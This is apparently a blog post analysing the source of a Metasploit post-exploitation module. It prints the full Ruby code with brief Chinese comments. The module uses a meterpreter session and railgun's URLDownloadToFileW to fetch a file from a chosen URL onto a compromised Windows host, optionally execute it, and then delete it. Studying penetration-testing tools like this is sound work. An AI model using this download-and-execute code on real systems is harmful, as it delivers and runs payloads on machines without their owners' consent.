##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::File
def initialize(info={})
super(update_info(info,
'Name' => "Windows Manage Download and/or Execute",
'Description' => %q{
This module will download a file by importing urlmon via railgun.
The user may also choose to execute the file with arguments via exec_string.
},
'License' => MSF_LICENSE,
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Author' => ['RageLtMan']
))
register_options(
[
OptString.new('URL', [true, 'Full URL of file to download' ]),
OptString.new('DOWNLOAD_PATH', [false, 'Full path for downloaded file' ]),
OptString.new('FILENAME', [false, 'Name for downloaded file' ]),
OptBool.new( 'OUTPUT', [true, 'Show execution output', true ]),
OptBool.new( 'EXECUTE', [true, 'Execute file after completion', false ]),
]) #设置download_exec传入到参数,true表示必须的参数,false表示可选参数
register_advanced_options(
[
OptString.new('EXEC_STRING', [false, 'Execution parameters when run from download directory' ]),
OptInt.new( 'EXEC_TIMEOUT', [true, 'Execution timeout', 60 ]),
OptBool.new( 'DELETE', [true, 'Delete file after execution', false ]),
])
end
# Check to see if our dll is loaded, load and configure if not
def add_railgun_urlmon. #加载URLDowloadToFileW函数的地址
if client.railgun.libraries.find_all {|d| d.first == 'urlmon'}.empty?
session.railgun.add_dll('urlmon','urlmon')
session.railgun.add_function(
'urlmon', 'URLDownloadToFileW', 'DWORD',
[
['PBLOB', 'pCaller', 'in'],
['PWCHAR','szURL','in'],
['PWCHAR','szFileName','in'],
['DWORD','dwReserved','in'],
['PBLOB','lpfnCB','inout']
])
vprint_good("urlmon loaded and configured")
else
vprint_status("urlmon already loaded")
end
end
def run #脚本的入口点
# Make sure we meet the requirements before running the script, note no need to return
# unless error
return 0 if session.type != "meterpreter"
# get time
strtime = Time.now
# check/set vars
url = datastore["URL"] #读取参数
filename = datastore["FILENAME"] || url.split('/').last
path = datastore['DOWNLOAD_PATH']
if path.blank?
path = session.sys.config.getenv('TEMP') #如果没有传入downlaod_path,就使用默认的temp路径
else
path = session.fs.file.expand_path(path)
end
outpath = path + '\\' + filename
exec = datastore['EXECUTE']
exec_string = datastore['EXEC_STRING']
output = datastore['OUTPUT']
remove = datastore['DELETE']
# set up railgun
add_railgun_urlmon
# get our file
vprint_status("Downloading #{url} to #{outpath}")
client.railgun.urlmon.URLDownloadToFileW(nil,url,outpath,0,nil) #核心代码下载文件
# check our results
begin
out = session.fs.file.stat(outpath)
print_status("#{out.stathash['st_size']} bytes downloaded to #{outpath} in #{(Time.now - strtime).to_i} seconds ")
rescue
print_error("File not found. The download probably failed")
return
end
# Execute file upon request
if exec. #判断是否要执行下载的文件
begin
cmd = "\"#{outpath}\" #{exec_string}"
print_status("Executing file: #{cmd}")
res = cmd_exec(cmd, nil, datastore['EXEC_TIMEOUT'])
print_good(res) if output and not res.empty?
rescue ::Exception => e
print_error("Unable to execute: #{e.message}")
end
end
# remove file if needed
if remove #是否删除下载的文件
begin
print_status("Deleting #{outpath}")
session.fs.file.rm(outpath)
rescue ::Exception => e
print_error("Unable to remove file: #{e.message}")
end
end
end
end
msf download_exec模块源码分析
最新推荐文章于 2024-10-23 16:13:54 发布
本文介绍了一个Metasploit框架下的后渗透模块,该模块通过导入urlmon实现文件下载,并提供执行下载文件的功能。模块可在Windows平台上使用,支持Meterpreter会话,允许用户指定URL、下载路径、文件名等参数。
扫一扫
5596
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
